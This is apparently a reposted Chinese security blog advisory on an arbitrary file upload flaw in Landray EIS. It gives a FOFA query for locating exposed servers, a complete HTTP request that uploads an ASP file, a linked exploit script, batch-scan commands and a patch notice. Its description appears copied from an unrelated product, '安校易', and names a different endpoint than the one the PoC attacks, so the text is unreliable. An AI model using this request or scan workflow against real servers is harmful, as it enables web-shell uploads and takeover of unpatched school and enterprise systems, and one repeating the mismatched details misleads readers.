fofa
body="/Scripts/jquery.landray.dialog.js"
一、漏洞简述
“安校易”以物联网技术为基础,以学生在校“学食住行”管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。同时,“安校易”又以大数据、人脸识别技和移动互联网为核心技术,以“安全·安心·沟通”为核心诉求,在教育局、学校、家长之间构建一个和谐高效和智慧的沟通互动平台,促进教育合力和智慧教育生态体系成型,做到让学校管理安全、让老师管理快捷、让领导科学决策和让家长安心放心。其接口FileUpProductupdate.aspx存在任意文件上传漏洞,攻击者可通过该漏洞获取系统权限。
二、漏洞检测poc
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x
User-Agent: MMozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Length: 152
Content-Type: multipart/form-data; boundary=---123
Connection: close
-----123
Content-Disposition: form-data; name="file"; filename="test.asp"
Content-Type: text/html
<%Response.Write("HelloWorldTest")%>
-----123--
回显路径:/files/editor_img/xxxx/xxxxxx.asp
三、漏洞检测脚本
安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:
https://github.com/ATonysan/poc-exp/blob/main/landrayEIS_api_ArbitraryFileUploads.py
批量检测:
python landrayEIS_api_ArbitraryFileUploads.py -f url.txt
单个url检测漏洞:
python landrayEIS_api_ArbitraryFileUploads.py -u url
四、修复
官方已更新补丁,请升级至最新版本。
官网地址:https://blue.landray.com.cn/eis/cate1
原文始发于微信公众号(苏诺木安全团队):【1day】蓝凌EIS api 任意文件上传漏洞【附poc】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论